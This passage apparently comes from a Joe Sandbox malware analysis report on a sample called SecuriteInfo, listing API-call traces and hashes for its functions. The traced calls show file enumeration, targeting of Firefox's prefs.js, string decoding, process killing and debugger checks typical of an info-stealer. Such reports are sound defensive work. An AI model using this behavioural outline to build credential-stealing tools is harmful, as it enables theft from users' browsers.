                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSleepSystemThreadTimeWaitwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 309841800-1013718255
                                      • Opcode ID: 7c6c7847df3b77c663ea4b972478af236543b496aa0119504b73a42c7240b211
                                      • Instruction ID: 28eef67b0024c8b9fc86cf21b386a92e55e7a94f07ac828387a502ac6bb4d16e
                                      • Opcode Fuzzy Hash: 7c6c7847df3b77c663ea4b972478af236543b496aa0119504b73a42c7240b211
                                      • Instruction Fuzzy Hash: 23E1137282010CAADB59FB60DD56EFDB338AF54780F404279F60662191EF706B68CF61
                                      Function 002FB390 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 283fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003134C0,003101E9), ref: 002FB3F2
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FB41C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FB436
                                      • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FB4B0
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FB562
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FB59A
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FB63E
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FB6F5
                                      • FindClose.KERNEL32(00000000), ref: 002FB704
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocateDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
                                      • String ID: prefs.js
                                      • API String ID: 155253302-3783873740
                                      • Opcode ID: 5d5a1a51b5cca7467a90e0a8d0dee4beddae530387431583fe7bef00ebb36f4f
                                      • Instruction ID: adc87d7f9bcf8559556f9347dc5503655973bf802b7881b52bace7289d7fd3d5
                                      • Opcode Fuzzy Hash: 5d5a1a51b5cca7467a90e0a8d0dee4beddae530387431583fe7bef00ebb36f4f
                                      • Instruction Fuzzy Hash: DBA1427192010DABDB58FB70DD569FDB778AF54380F408138EA05A3291EF70AA69CF91
                                      Function 002F9D40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 391fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003101E9), ref: 002F9D8B
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9DAE
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9DC8
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FA19B
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FA212
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FA250
                                      • FindClose.KERNEL32(00000000), ref: 002FA25F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                      • String ID: \*.*
                                      • API String ID: 4272825625-1173974218
                                      • Opcode ID: 401e63e5d07710ae80aed5af567443f69ceafa607f0553e816a1f563806cb53d
                                      • Instruction ID: ad564693d15026b654fe87c2372bafca1b43b3c7f4e792548800f9f207c9f7d3
                                      • Opcode Fuzzy Hash: 401e63e5d07710ae80aed5af567443f69ceafa607f0553e816a1f563806cb53d
                                      • Instruction Fuzzy Hash: D2E1E37182010CAADB59EBA0DD96EFEF338AF14780F504179F61662191EF706B59CF60
                                      Function 002F99F0 Relevance: 13.8, APIs: 9, Instructions: 251fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003134C0,003101E9), ref: 002F9A50
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9A6D
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9A87
                                      • StrCmpCA.SHLWAPI(?,02F45318,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002F9B03
                                      • StrCmpCA.SHLWAPI(?,02F456C0), ref: 002F9B69
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F8DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8E75
                                        • Part of subcall function 002F8DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8EAA
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002F9CDF
                                      • FindClose.KERNEL32(00000000), ref: 002F9CEE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1309316030-0
                                      • Opcode ID: 854a3320a4e5a4adab6b727b14a1d331833aff355709b46af5cdae0f82d64a59
                                      • Instruction ID: 32ba7f8249f89e96705dd08a2a90be2b48c24f3ab450df1cd222c70bdd415a05
                                      • Opcode Fuzzy Hash: 854a3320a4e5a4adab6b727b14a1d331833aff355709b46af5cdae0f82d64a59
                                      • Instruction Fuzzy Hash: 22914F7192010CA7CB68FB70DD56AFDB779AF443D0F404639FE0692291EF709A688A91
                                      Function 002F8980 Relevance: 9.1, APIs: 6, Instructions: 100stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 002F89A9
                                      • lstrlen.KERNEL32(?,00000001,?,00001FA0,00000000,00000000), ref: 002F89C6
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002F89CE
                                      • memcpy.MSVCRT(?,?,?), ref: 002F8A3A
                                      • lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A6D
                                      • lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: c6769cc163950f52bdb035c1539e777e8932fdbd3995b7e361c4916787842db4
                                      • Instruction ID: 67f58765266033998684c67df4afa1f582ac169e81693d58dbc6519af94ca44b
                                      • Opcode Fuzzy Hash: c6769cc163950f52bdb035c1539e777e8932fdbd3995b7e361c4916787842db4
                                      • Instruction Fuzzy Hash: 16314876E002096BD7119B58EC85BEEFB7CEF48700F088075F908E2240DBB05B588BE1
                                      Function 003012F0 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301329
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00301339
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030134B
                                      • StrCmpCA.SHLWAPI(?,?), ref: 00301360
                                      • CloseHandle.KERNEL32(00000000), ref: 00301385
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 28839f6600a034fe86a9ae264d4a3b415a4d0d68fc6cc5426e5c1aa2bfadc25d
                                      • Instruction ID: e121e283756e79b7170d36d3fe0bdc6ca1478ce9a31bf429f0c0741073b1b681
                                      • Opcode Fuzzy Hash: 28839f6600a034fe86a9ae264d4a3b415a4d0d68fc6cc5426e5c1aa2bfadc25d
                                      • Instruction Fuzzy Hash: 39118175A01218AFDB21DF98DC05BEEB7BCFB49710F0042AAE809E3680D7345A04CBA1
                                      Function 0030D12F Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0030DB06
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030DB1B
                                      • UnhandledExceptionFilter.KERNEL32(00315C14), ref: 0030DB26
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0030DB42
                                      • TerminateProcess.KERNEL32(00000000), ref: 0030DB49
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
